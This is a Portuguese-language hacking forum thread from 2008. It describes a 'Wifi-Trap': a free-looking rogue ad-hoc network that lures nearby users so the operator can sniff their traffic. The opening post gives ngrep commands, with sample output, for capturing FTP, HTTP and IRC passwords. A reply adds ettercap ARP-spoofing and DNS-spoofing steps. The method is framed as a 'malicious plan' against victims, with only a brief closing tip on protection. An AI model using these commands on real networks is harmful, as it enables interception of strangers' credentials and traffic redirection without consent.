Wifi-TRAP e snifing

Iniciado por C00L3R, 09 de Dezembro , 2008, 05:54:42 PM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

Imprimir
Ir para o fim Páginas1
Ações

C00L3R

09 de Dezembro , 2008, 05:54:42 PM Última edição: 09 de Dezembro , 2008, 11:18:48 PM por Reeves
Este artigo veio do resultado de varios estudos de how too inglês espalhados por ai qualquer semelhança
pode ter sido uma influencia...

Salve pessoal do BotecoUnix neste artigo vou mostrar uma técnica diferente de snifing ou seja farejar dados de um alvo,Bem a teoria desta técnica é bem simples imagine uma rede uma teia de aranha os insetos vão na teia por vontade enquanto a aranha faz o serviço dela... vou explicar

vamos para o ambiente, digamos que o cracker tenha uma maquina com uma placa de rede ligada na internet e outra placa wireless com chipset atheros por exemplo em modo “Ad-Hoc” cujo o “essid” esteja com nome “livre rede livre”

Desta forma todos que tiver no raio do sinal vão ficar lokos para entrar e ter internet gratis mas ai que entra o plano maléfico, limitamos o sinal dos clientes conectados e podemos fazer “N” coisas como “DNS poison” fazendo fakes do yahoo,google por exemplo ou podemos snifar e extrair dos packets o que nos intereça ou seja “Senhas” e dados do cliente para tal feito vamos usar o “NGREP” que nada mais é que um Snifer que podemos achar dados de acordo com uma determinada “Regex” exemplos
capturar dados do serviço FTP

Código Selecionar
;ngrep -wi -d any ‘user|pass’ port 21
capturar senhas da porta 80
ngrep -wi -d wlan0 'pass' port 80 -W
suponhamos que você queira pegar senhas de IRC
    ngrep-1.45 # ./ngrep -wi -d wlan0 'user|pass' port 6667
    interface: wlan0 (192.168.1.0/255.255.255.0)
    filter: (ip) and ( port 6667 )
    match: ((^user|pass\W)|(\Wuser|pass$)|(\Wuser|pass\W))
    ########
    T 192.168.1.104:60420 -> 84.45.99.122:6667 [AP]
      PASS mypassword.
    ####
    T 192.168.1.104:60420 -> 84.45.99.122:6667 [AP]
      USER d3hydr8 8 * :d3hydr8.

    Ou senhas de http
    linuxbox:/home/d3hydr8/ngrep-1.45 # ./ngrep -q -d wlan0 -W byline port 80 -n 5
    interface: wlan0 (192.168.1.0/255.255.255.0)
    filter: (ip) and ( port 80 )

    T 192.168.1.104:42263 -> 205.158.62.76:80 [AP]
    GET
    /scripts/common/proxy.main?show_frame=Enter&action=login&domain=linuxmail.org&v=
    9e4b59553085147ce2d5e268d0a8419d05dc4cb5c0f49a1fbc09f367d6d29229&login=d3hydr8&
    password=34819d7beeabb9260a5c854bc85b3e44&hash=1&md5=1 HTTP/1.1.
    Host: www.linuxmail.org.
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20071015
    SUSE/2.0.0.10-0.1 Firefox/2.0.0.10.
    Accept:
    text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
    image/png,*/*;q=0.5.
    Accept-Language: en-us,en;q=0.5.
    Accept-Encoding: gzip,deflate.
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7.
    Keep-Alive: 300.
    Connection: keep-alive.
    Referer: http://www.linuxmail.org/scripts/common/index.main?signin=1&lang=us.
    Cookie: loginName=d3hydr8.
Bem fico por aqui pessoal espero que esta dica ajude o pessoal
e usem uma criptografia boa antes de entrar em uma rede sem "WEP" ou "WPA"
verifique se é um roteador,acess point se não pode ser é nenhum cara fazendo Wifi-Trap
thanks para d3hydr8 e google visite ai depois [ propaganda ] ;)

Reeves

#1
09 de Dezembro , 2008, 11:15:42 PM Última edição: 10 de Dezembro , 2008, 08:17:52 AM por Reeves
Citação de: C00L3R online 09 de Dezembro , 2008, 05:54:42 PM

Salve pessoal do BotecoUnix neste artigo vou mostrar uma técnica diferente

pows
obrigado mas....
alem da propaganda tremendo ctrl + c ctrl +v de seu forum...
usuário mal intencionado?
mesmo eu sendo o corleone nunca fiz propaganda do darkers na sua comunidade
:x
  °vº   NÃO USE DROGAS,
/(_)\  USE GNU/LINUX
^ ^

KEst

#2
10 de Dezembro , 2008, 06:16:06 AM
Citação de: Reeves online 09 de Dezembro , 2008, 11:15:42 PM
mesmo eu sendo o jack corleone nunca fiz propaganda do darkers na sua comunidade
:x

o que é jack corleone?
:p

by
KEst

Campanha Converta-se a Gnu is Not Unix/Linux

kohx

#3
10 de Dezembro , 2008, 12:46:57 PM
Citação de: KEst online 10 de Dezembro , 2008, 06:16:06 AM
Citação de: Reeves online 09 de Dezembro , 2008, 11:15:42 PM
mesmo eu sendo o jack corleone nunca fiz propaganda do darkers na sua comunidade
:x

o que é jack corleone?
:p

by
KEst

Corleone?

Num é aquele cara do The God Father (Poderoso Chefão) uia...  ;D

Dr34m3xpl0

#4
10 de Dezembro , 2008, 01:46:41 PM
Seria recomendado antes de usar o ngrep para pegar os pacotes instalar o ettercap
# apt-get install ettercap
ou
#sudo yum install ettercap

Depois de instalado você teria que fazer um ARP Spoofing para o tráfego da rede passar por você, usando o seguinte comando.

#ettercap -T -q -M ARP //

Pronto o ARP Spoofing esta pronto.

Mas aproveitando o "embalo" vamos fazer um DNS Spoofing.
Vá no diretorio "/usr/share/ettercap" e autere o arquivo "etter.dns" para "Spoofar" o DNS desejado.
Depois disto aperte "h" para aparecer o MENU, em seguida "p" para os plugs.

Digite "dns-Spoof"

Aguarde um estante e "buala" esta pronto.

C00L3R

#5
11 de Dezembro , 2008, 11:50:45 AM
desculpe pessoal ter pegado do botecounix
mal JackCorleone nem sabia que era voce nem sabia que o forum era seu
minhas desculpas...

he que tipo to querendo chamar mais nerds pro boteco etc...
sabe como he ... mals

Reeves

#6
11 de Dezembro , 2008, 12:12:04 PM
da nada não C00L3R..
até que entendo kra
mas é mals   :p

e o forum não é MEU
o forum é NOSSO!

vc é muito bem vindo aqui kra, mas pega leve com a propaganda :x

Hug's
  °vº   NÃO USE DROGAS,
/(_)\  USE GNU/LINUX
^ ^
Imprimir
Ir para o topo Páginas1
Ações